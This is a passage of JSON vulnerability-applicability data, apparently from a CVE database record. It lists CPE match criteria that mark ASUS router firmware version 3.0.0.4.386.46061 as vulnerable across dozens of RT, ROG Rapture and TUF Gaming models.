false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:rt-ax82u:-:*:*:*:*:*:*:*", "matchCriteriaId": "8D118305-CAFD-425F-8352-3B241D2E7702", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:rt-ax3000_firmware:3.0.0.4.386.46061:*:*:*:*:*:*:*", "matchCriteriaId": "A15CDE16-255C-4A40-94A7-95C788FB2BE1", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:rt-ax3000:-:*:*:*:*:*:*:*", "matchCriteriaId": "1515AF83-732F-489B-A25C-5D67A03A3B25", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:rt-ax58u_firmware:3.0.0.4.386.46061:*:*:*:*:*:*:*", "matchCriteriaId": "0FBE622D-B408-44B2-B7C6-24D57539FB9B", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:rt-ax58u:-:*:*:*:*:*:*:*", "matchCriteriaId": "855509B2-CE29-4A04-B412-C160139EA392", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:rt-ax55_firmware:3.0.0.4.386.46061:*:*:*:*:*:*:*", "matchCriteriaId": "1A169487-AD9E-4F63-87EB-673B0341B890", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:rt-ax55:-:*:*:*:*:*:*:*", "matchCriteriaId": "B8F27D4F-EDC4-4676-8C66-545378850BF1", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:rt-ax56u_firmware:3.0.0.4.386.46061:*:*:*:*:*:*:*", "matchCriteriaId": "7A3B2034-A825-4EE4-926F-7D871B6F9A35", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:rt-ax56u:-:*:*:*:*:*:*:*", "matchCriteriaId": "4D747097-702E-4046-9723-01A586336534", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:rt-ac66u\\+_firmware:3.0.0.4.386.46061:*:*:*:*:*:*:*", "matchCriteriaId": "34BF10C4-7822-42F6-B114-87C5EB78BFA5", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:rt-ac66u\\+:-:*:*:*:*:*:*:*", "matchCriteriaId": "609655F3-B9AE-4075-A351-9B36195541AD", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:rog_rapture_gt-ac5300_firmware:3.0.0.4.386.46061:*:*:*:*:*:*:*", "matchCriteriaId": "F1F1C8AB-0A44-454A-9149-86559022F42E", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:rog_rapture_gt-ac5300:-:*:*:*:*:*:*:*", "matchCriteriaId": "06FA8797-3675-479A-AFBB-AC4F25B439CC", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:rog_rapture_gt-ax11000_firmware:3.0.0.4.386.46061:*:*:*:*:*:*:*", "matchCriteriaId": "ED377F42-5880-487E-A942-EC9B109CB69D", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:rog_rapture_gt-ax11000:-:*:*:*:*:*:*:*", "matchCriteriaId": "990862C8-4B83-4C35-88E2-91186E52C6D2", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:rog_rapture_gt-ac2900_firmware:3.0.0.4.386.46061:*:*:*:*:*:*:*", "matchCriteriaId": "C9153836-7577-44AE-ACD1-DC8991A77D28", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:rog_rapture_gt-ac2900:-:*:*:*:*:*:*:*", "matchCriteriaId": "2F9DBAB2-B19E-44DC-AAB8-964E3552D6FC", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:rt-ac1300uhp_firmware:3.0.0.4.386.46061:*:*:*:*:*:*:*", "matchCriteriaId": "0B8FFBE7-4B92-488A-915B-1C5598D81FD0", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:rt-ac1300uhp:-:*:*:*:*:*:*:*", "matchCriteriaId": "C54B97C8-B312-4A17-BBF1-7381D28912B1", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:rt-ac1300g\\+_firmware:3.0.0.4.386.46061:*:*:*:*:*:*:*", "matchCriteriaId": "FD1E8C93-1633-4118-85FA-120B962AE214", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:rt-ac1300g\\+:-:*:*:*:*:*:*:*", "matchCriteriaId": "5ECDCBA1-4198-40C0-B9D7-170BC2AB8261", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:tuf_gaming_ax5400_firmware:3.0.0.4.386.46061:*:*:*:*:*:*:*", "matchCriteriaId": "0D790FA3-E1B3-46CE-BB52-611CC4CF91A3", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:tuf_gaming_ax5400:-:*:*:*:*:*:*:*", "matchCriteriaId": "6E77AB7A-918A-4337-A757-CD1083CCCDF7", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:tuf_gaming_ax3000_v2_firmware:3.0.0.4.386.46061:*:*:*:*:*:*:*", "matchCriteriaId": "7497F325-BD79-432B-82E0-628CA7E51CA7", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:tuf_gaming_ax3000_v2:-:*:*:*:*:*:*:*", "matchCriteriaId": "8B78882B-11A8-46D9-A425-1ACAE6EF7CDC", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:rt-ac1200_firmware:3.0.0.4.386.46061:*:*:*:*:*:*:*", "matchCriteriaId": "E1864563-DEBF-412B-8763-58161F6D309D", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:rt-ac1200:-:*:*:*:*:*:*:*", "matchCriteriaId": "9BE19DF1-EB89-4CE5-956F-79BD4AD5E52F", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:rt-ac5300_firmware:3.0.0.4.386.46061:*:*:*:*:*:*:*", "matchCriteriaId": "7BEA8F8C-0A72-42C9-A456-A9A4CACD2CB2", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:rt-ac5300:-:*:*:*:*:*:*:*", "matchCriteriaId": "55EE62D6-1E29-4E84-8944-D3D68E212140", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:rt-ac1200g_firmware:3.0.0.4.386.46061:*:*:*:*:*:*:*", "matchCriteriaId": "6FBF2427-0F6A-461B-8B03-D23A6C3BF404", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:rt-ac1200g:-:*:*:*:*:*:*:*", "matchCriteriaId": "1CF74439-AD6D-4BBB-9254-640170FE1CF3", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:rt-ac1200hp_firmware:3.0.0.4.386.46061:*:*:*:*:*:*:*", "matchCriteriaId": "850E8DCA-6B59-4F03-97B8-0A332B025987", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:rt-ac1200hp:-:*:*:*:*:*:*:*", "matchCriteriaId": "37EA4BB5-7F63-4CD5-9F66-7EC0BB901FC0", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:rt-ac1200g\\+_firmware:3.0.0.4.386.46061:*:*:*:*:*:*:*", "matchCriteriaId": "0F2F3B5D-C56E-4391-A71B-C1B58E308FBB", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:rt-ac1200g\\+:-:*:*:*:*:*:*:*", "matchCriteriaId": "3F0A7BAC-63CD-4758-9463-211574486A45", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:rt-ac1200e_firmware:3.0.0.4.386.46061:*:*:*:*:*:*:*", "matchCriteriaId": "458E3EB7-EF12-43BD-8956-9E892C886AAC", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:rt-ac1200e:-:*:*:*:*:*:*:*", "matchCriteriaId": "28248D9F-07A8-4FBF-818D-B76DB38854FB", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:rt-ac1200gu_firmware:3.0.0.4.386.46061:*:*:*:*:*:*:*", "matchCriteriaId": "52D88F76-7B33-4B37-B057-D1B7F7A8D363", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:rt-ac1200gu:-:*:*:*:*:*:*:*", "matchCriteriaId": "5C1CC84A-95E3-4F28-B831-040619426244", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:rt-ac3100_firmware:3.0.0.4.386.46061:*:*:*:*:*:*:*", "matchCriteriaId": "2915225A-086C-4585-BF59-D6E075C78197", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:rt-ac3100:-:*:*:*:*:*:*:*", "matchCriteriaId": "B9B17C2B-A1EC-4FC1-8AB1-F35D9E3A0AA2", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:rt-ac58u_firmware:3.0.0.4.386.46061:*:*:*:*:*:*:*", "matchCriteriaId": "5E50CFD0-2B4C-4D77-9A32-03D0474D91E4", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:rt-ac58u:-:*:*:*:*:*:*:*", "matchCriteriaId": "50D22A86-7CA0-49EC-8B1D-47D6B7E8E15F", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:rt-ac88u_firmware:3.0.0.4.386.46061:*:*:*:*:*:*:*", "matchCriteriaId": "8C33813E-EA85-4F4E-9FE7-997267884BB6", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:rt-ac88u:-:*:*:*:*:*:*:*", "matchCriteriaId": "81008E66-B5E8-4DE5-B14D-E6983C69BC29", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:rt-ac56u_firmware:3.0.0.4.386.46061:*:*:*:*:*:*:*", "matchCriteriaId": "775AB1CB-F843-4262-AB43-BC13AA298CEE", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:rt-ac56u:-:*:*:*:*:*:*:*", "matchCriteriaId": "F3E87BA7-FACD-46B2-BE2A-9EFEA3C62C17", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:rt-ac56r_firmware:3.0.0.4.386.46061:*:*:*:*:*:*:*", "matchCriteriaId": "C72E066D-30CB-49E9-8C10-7C4C453E2813", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:rt-ac56r:-:*:*:*:*:*:*:*", "matchCriteriaId": "E32874C8-05B6-44A1-B118-DC2F4FE62134", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:rt-ac56s_firmware:3.0.0.4.386.46061:*:*:*:*:*:*:*", "matchCriteriaId": "BBCD73E0-9220-49F9-AA7B-B2AF132051CB", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:rt-ac56s:-:*:*:*:*:*:*:*", "matchCriteriaId": "63A1E548-F12D-4BF7-9C01-1325A725FF91", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:rt-ac3200_firmware:3.0.0.4.386.46061:*:*:*:*:*:*:*", "matchCriteriaId": "3303372F-E52E-4756-B205-773B77DCC24B", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:rt-ac3200:-:*:*:*:*:*:*:*", "matchCriteriaId": "AFE8A3B1-284B-40EC-872E-B8F7103F108C", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:rt-ac55u_firmware:3.0.0.4.386.46061:*:*:*:*:*:*:*", "matchCriteriaId": "8F75EF51-9844-4D74-884A-7C04AFF6C310", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:rt-ac55u:-:*:*:*:*:*:*:*", "matchCriteriaId": "4C7DF43D-7EEE-405C-BB2B-822936BCB4A0", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:rt-ac2900_firmware:3.0.0.4.386.46061:*:*:*:*:*:*:*", "matchCriteriaId": "F7C9E5F6-5402-427C-A85F-D82B0D4E1DF2", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:rt-ac2900:-:*:*:*:*:*:*:*", "matchCriteriaId": "F2640D39-F0C3-49AA-87D1-F423150FDF2E", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:rt-ac55uhp_firmware:3.0.0.4.386.46061:*:*:*:*:*:*:*", "matchCriteriaId": "ABAA43C6-2DBA-4ADF-8773-9C25A0DDEE9C", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:rt-ac55uhp:-:*:*:*:*:*:*:*", "matchCriteriaId": "3C69102D-EF9E-4E84-B9FA-9049F7816E26", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:rt-ac2600_firmware:3.0.0.4.386.46061:*:*:*:*:*:*:*", "matchCriteriaId": "9DC73139-1865-4E6C-9A4F-E4F79B1FE9CB", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:rt-ac2600:-:*:*:*:*:*:*:*", "matchCriteriaId": "985B5B75-7936-413C-A4DD-608E1378718A", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:rt-ac53_firmware:3.0.0.4.386.46061:*:*:*:*:*:*:*", "matchCriteriaId": "116B31F2-6DCD-4342-BE0C-7FCADEBBAF87", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:rt-ac53:-:*:*:*:*:*:*:*", "matchCriteriaId": "E09FFA25-CEE0-4529-A4F3-A93D23CB26F3", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:rt-ac2400_firmware:3.0.0.4.386.46061:*:*:*:*:*:*:*", "matchCriteriaId": "3926212A-CA52-48FD-BE4D-A1B656BCF133", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:rt-ac2400:-:*:*:*:*:*:*:*", "matchCriteriaId": "56484DE8-0DBE-40E5-A652-8438CD1EF9A1", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:rt-ac52u_b1_firmware:3.0.0.4.386.46061:*:*:*:*:*:*:*", "matchCriteriaId": "6845A682-26C6-4E80-B0F4-B400B1EB7AC0", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:rt-ac52u_b1:-:*:*:*:*:*:*:*", "matchCriteriaId": "959BF67B-D5CF-4E55-981F-56149DCCC927", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:rt-ac2200_firmware:3.0.0.4.386.46061:*:*:*:*:*:*:*", "matchCriteriaId": "8F2F84B7-B8D0-4A7D-ACE4-EBA4FDADF85E", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:rt-ac2200:-:*:*:*:*:*:*:*", "matchCriteriaId": "FC0ADA8C-58FE-4EDD-B979-FF02639A79A2", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:rt-ac51u_firmware:3.0.0.4.386.46061:*:*:*:*:*:*:*", "matchCriteriaId": "C1525164-721B-4A5D-8BC1-036CEF01AA72", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:rt-ac51u:-:*:*:*:*:*:*:*", "matchCriteriaId": "24748D40-7F43-44DA-BBEF-46D85D2AADA3", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:rt-ac51u\\+_firmware:3.0.0.4.386.46061:*:*:*:*:*:*:*", "matchCriteriaId": "4E3F816D-560D-4B7F-8CC0-CED83EB6C45B", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:rt-ac51u\\+:-:*:*:*:*:*:*:*", "matchCriteriaId": "A56B3D13-D0A5-482C-9E40-173EF23DA849", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:rt-ac87u_firmware:3.0.0.4.386.46061:*:*:*:*:*:*:*", "matchCriteriaId": "958A0324-8CEE-433D-9E10-FBFFF83B5D2B", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:rt-ac87u:-:*:*:*:*:*:*:*", "matchCriteriaId": "317B2498-88CE-431F-97E1-EFE7F7E34E05", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:rt-ac87r_firmware:3.0.0.4.386.46061:*:*:*:*:*:*:*", "matchCriteriaId": "D7BD3267-CA06-4AF0-838C-6022242B0A9D", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:rt-ac87r:-:*:*:*:*:*:*:*", "matchCriteriaId": "34D91D22-049E-46BB-A85D-D9FDD81BCAB2", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:rt-acrh17_firmware:3.0.0.4.386.46061:*:*:*:*:*:*:*", "matchCriteriaId": "049ACFBB-76CE-450F-8F33-5C5CAE3FCF36", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:rt-acrh17:-:*:*:*:*:*:*:*", "matchCriteriaId": "137B2237-4581-4894-A36A-DE49C96CB80F", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:rt-ac86u_firmware:3.0.0.4.386.46061:*:*:*:*:*:*:*", "matchCriteriaId": "5D3E1E2F-BDFF-43CB-ACED-90386148F25E", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:rt-ac86u:-:*:*:*:*:*:*:*", "matchCriteriaId": "89095282-ABBD-4056-B731-7F05638DB1A6", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:rt-acrh13_firmware:3.0.0.4.386.46061:*:*:*:*:*:*:*", "matchCriteriaId": "E91F2C90-9924-4A5B-B480-9359D65D4997", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:rt-acrh13:-:*:*:*:*:*:*:*", "matchCriteriaId": "41AF79B6-D208-4357-A08D-D1AB6F136F59", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:rt-ac85u_firmware:3.0.0.4.386.46061:*:*:*:*:*:*:*", "matchCriteriaId": "C28ADB3C-23C9-463C-9005-4641B3D54817", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:rt-ac85u:-:*:*:*:*:*:*:*", "matchCriteriaId": "40933EE3-E7D1-438E-B551-892D20042593", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:rt-n66u_firmware:3.0.0.4.386.46061:*:*:*:*:*:*:*", "matchCriteriaId": "D653C25C-CE16-4CFA-9D14-790D95B9E3A6", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:rt-n66u:-:*:*:*:*:*:*:*", "matchCriteriaId": "7A60BB38-11FC-48C4-B592-29C6C3A6FEAE", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:rt-n66r_firmware:3.0.0.4.386.46061:*:*:*:*:*:*:*", "matchCriteriaId": "90714873-F25D-498F-B4B8-09F0BD3810E5", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:rt-n66r:-:*:*:*:*:*:*:*", "matchCriteriaId": "EB4466BA-09EB-43F0-9610-6574F10B5810", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:rt-n66w_firmware:3.0.0.4.386.46061:*:*:*:*:*:*:*", "matchCriteriaId": "549EF224-94AE-4226-88D2-DB70671B5EFE", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:rt-n66w:-:*:*:*:*:*:*:*", "matchCriteriaId": "FAB181BD-4C90-44F4-9E43-1230C2455243", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:rt-n66c1_firmware:3.0.0.4.386.46061:*:*:*:*:*:*:*", "matchCriteriaId": "9D6EA4E6-F589-43A1-BB57-995F8A79CBA0", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:rt-n66c1:-:*:*:*:*:*:*:*", "matchCriteriaId": "9B08A821-2DDD-4B4E-991D-7A683073D3F3", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:rt-ac85p_firmware:3.0.0.4.386.46061:*:*:*:*:*:*:*", "matchCriteriaId": "822329E4-C623-444A-84D1-0B729E0D82C6", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:rt-ac85p:-:*:*:*:*:*:*:*", "matchCriteriaId": "5D268AD1-5F24-46CE-8E23-B24ECE6D049A", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:rt-n18u_firmware:3.0.0.4.386.46061:*:*:*:*:*:*:*", "matchCriteriaId": "A2284A76-5377-42B1-A7FB-21718E3623B8", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:rt-n18u:-:*:*:*:*:*:*:*", "matchCriteriaId": "FB744DE5-64DB-4EFF-A23C-EE9BB57A36C4", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:rt-ac65p_firmware:3.0.0.4.386.46061:*:*:*:*:*:*:*", "matchCriteriaId": "08853311-7B1D-475E-BF65-4C833DE6B865", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:rt-ac65p:-:*:*:*:*:*:*:*", "matchCriteriaId": "1B9BA5F5-E43D-4187-9BED-4A71BA4E4974", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:rt-n19_firmware:3.0.0.4.386.46061:*:*:*:*:*:*:*", "matchCriteriaId": "006A39FA-D10A-47DB-8EA8-1F7735CDE42B", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:rt-n19:-:*:*:*:*:*:*:*", "matchCriteriaId": "507A5D4D-CAF9-4417-9EA6-B499E04D1CDD", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:rt-ac57u_firmware:3.0.0.4.386.46061:*:*:*:*:*:*:*", "matchCriteriaId": "D118329C-B834-4D68-8A11-46771DC2EA7A", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:rt-ac57u:-:*:*:*:*:*:*:*", "matchCriteriaId": "8F42D43F-C52B-4809-9E08-5F908DF0E67D", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:rt-n14uhp_firmware:3.0.0.4.386.46061:*:*:*:*:*:*:*", "matchCriteriaId": "06E53E35-1576-470B-9CBB-9D59B9332A7A", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:rt-n14uhp:-:*:*:*:*:*:*:*", "matchCriteriaId": "FE76A8DF-A914-4700-8EE2-29CD4205F4B8", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:rt-ac68u_firmware:3.0.0.4.386.46061:*:*:*:*:*:*:*", "matchCriteriaId": "BB6A2CA4-91BB-4500-8733-9205E7FFB3D6", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:rt-ac68u:-:*:*:*:*:*:*:*", "matchCriteriaId": "1E23D00B-76E3-438C-8023-3D7CC6AEEE15", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:rt-ac68r_firmware:3.0.0.4.386.46061:*:*:*:*:*:*:*", "matchCriteriaId": "97254DEB-10C1-4020-8E7A-E2088A774DB1", "vulnerable": true } ], "negate": false, "operator": "OR" }, 